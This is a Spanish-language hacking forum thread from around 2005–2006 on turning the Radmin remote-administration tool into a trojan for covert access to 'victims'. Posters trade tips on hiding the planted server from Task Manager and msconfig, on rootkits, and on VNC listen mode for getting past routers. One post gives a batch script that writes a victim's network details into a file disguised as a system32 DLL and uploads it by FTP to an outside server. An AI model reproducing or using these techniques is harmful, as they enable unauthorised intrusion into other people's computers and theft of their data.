 Autor
|
Tema: Troyanizando Radmin 2.1 control remoto (Leído 162,737 veces)
|
carlipus
 Desconectado
Mensajes: 358
|
Si no te entendido mal, es si no se puede configurar desde Telnet remotamente, configurarlo por http, pues si el puerto 80 está abierto, tan solo tendrías que poner en tu explorador de Internet, http://IPEs igual que cuando accedes a tu Router a través de http. Y hay te saldrá contraseña y password del Router, y entras, por Http, resulta más fácil configurar. Saludos |
|
|
|
« Última modificación: 21 Septiembre 2005, 21:13 pm por carlipus »
|
En línea
|
|
|
|
Zool
Desconectado
Mensajes: 18
|
Muchas Gracias Carlipus, me sacaste la duda  |
|
|
|
|
En línea
|
|
|
|
carlipus
Desconectado
Mensajes: 358
|
De nada!
Saludos!
|
|
|
|
|
En línea
|
|
|
|
scar_face
Desconectado
Mensajes: 1
|
Hola a todos y gracias por acernos la vida asi de simple jeje, pero.... como podria hacer para q el r_server aparezca como aplicacion de sistema y no como aplicacion de usuario en el administrador de tareas por q asi solo le dan matar proceso y chau conexión, y tambien como hacer para q no aparezca en el msconfig el inicio de nc y del radmin server camuflageado, si alguien tiene alguna sugerencia o algun material para ilustrarme en este asunto por favor publicarlo aqui asi no sea yo solamente el beneficiado si no todos lo lectores de este foro ok.
Weno un saludo a todos y hasta la proxima.
|
|
|
|
|
En línea
|
|
|
|
tRekU
Desconectado
Mensajes: 258
|
xdd
Pues no he leido el hilo, pero si has seguido los pasos, el radmin se te habra instalado como servicio en la makina en cuestion, lo que quiere decir que en el proximo reinicio sera lanzado como system..
Salu2
P.D.: Anelkaos (Ocultar Remote Administrator 2.1 de la lista de servicios). Rootkit, se que se puede cambiar el nombre pues alguno me encontrao pero a saber, tocando el registro imagino que se podra igual .. pero amos .. root, y adios proceso, servicio y puerto .. XDD
|
|
|
|
|
En línea
|
|
|
|
leprox
Desconectado
Mensajes: 5
|
Para saltear los routers/gateways ,lo mejor es usar VNC en "listen mode" donde el puerto "escucha" es el nuestro y no el de la victima , por ende nos vamos a poder conectar donde queramos.
Otra opcion es el Remote Anything , el cual mediante una herramienta que se llama "directory server" nos va actualizando todas las victimas que se van infectando , de la misma forma que el vnc , en mode "listen" donde la conexion la establecen ellos hacia nosotros en el momento que ejecutan el server. yo lo uso , y no necesito reverse shell , netcat , ni nada para saltear fierewalls , es MUY recomendable.
|
|
|
|
|
En línea
|
|
|
|
ibiza-tdi
Desconectado
Mensajes: 3
|
K onda;
Oigan hize el tutorial al pie de la letra...Ya la victima tiene guardado todos los arhivos...Pero al intenar conectarme con ella Me dice k el Password es incorrecto...Y cheque el .bat y todo esta bien para k el password sea 123456 k pasara?
Saludos
Ibiza-Tdi... 8)
|
|
|
|
|
En línea
|
CoMpEtItIoN RuNs In OuR GeNeS AnD ThE HuNt FoR a MaTe HaS AlWaYs BeEn ThE UltImAtE FoRm Of CoMpEtItIoN
|
|
|
Paya_pollo
Desconectado
Mensajes: 4
|
hola a todo el mundo, gran tutorial por cierto, pero alguien sabe como quitar una proteccion que tiene el messenger, que borra el archivo automáticamente?, Gracias
|
|
|
|
|
En línea
|
|
|
|
debion
Desconectado
Mensajes: 104
Debion Networks
|
Buenas a todos,
he estado intentando troyanizar el radmin 2.2 , programando y compilando un archivo en C q ejecute unas instrucciones en cmd.exe .
El caso es q ésta nueva versión de radmin no incluye la opción de introducir la pass durante la instalación por línea de comandos.
Probando en una LAN he conseguido todo menos colocar un password imprescindible para conectarme al remoto.
Saben de qué manera podría incluir la pass en la instalación desde la línea de comandos y, si es posible, activar la opción HIDE para q desaparezca de la barra de herramientas ?
Gracias por anticipado y un saludo.
PD: Gracias a todos los q dia a dia colaboran en ésta web que tanto nos enseñan a principiantes informáticos como yo, facilitandonos en todos los casos la manera de aprender y comprender todo el entorno.
|
|
|
|
|
En línea
|
Venerato et erit veneratum
|
|
|
firewer
Desconectado
Mensajes: 120
|
Buenas he probado el siguiente codigo de la pagina 2 y me sale un error que no logro resolver.
@echo off
echo configuracion del sistema de la victima >C:\WINDOWS\system32\win32ip.dll
arp -a >>C:\WINDOWS\system32\win32ip.dll
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll
echo firewer >>C:\WINDOWS\system32\Win32el.dll
echo mipassword >>C:\WINDOWS\system32\Win32el.dll
echo put C:\WINDOWS\system32\win32ip.dll victima.txt >>C:\WINDOWS\system32\Win32el.dll
echo QUIT >>C:\WINDOWS\system32\Win32el.dll
ftp -s:C:\WINDOWS\system32\Win32el.dll ftp.usuarios.lycos.es
Me devuelve lo siguiente: (el pass y el usuario q pongo son correctos)
Conectado a ftp.usuarios.lycos.es.
220 212.78.204.234 FTP server ready
Usuario (ftp.usuarios.lycos.es:(none)):
331 Password required for firewer.
530 Login incorrect.
Error al iniciar la sesión.
ftp> put C:\WINDOWS\system32\win32ip.dll victima.txt
530 Please login with USER and PASS
530 Please login with USER and PASS
ftp> QUIT
221 Goodbye.
Ai algo mal?
Por cierto esto:
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll
Solo da la ip privada del pc, como se hace para la ip publica?
|
|
|
|
« Última modificación: 17 Febrero 2006, 20:08 pm por firewer »
|
En línea
|
|
|
|
|
 |
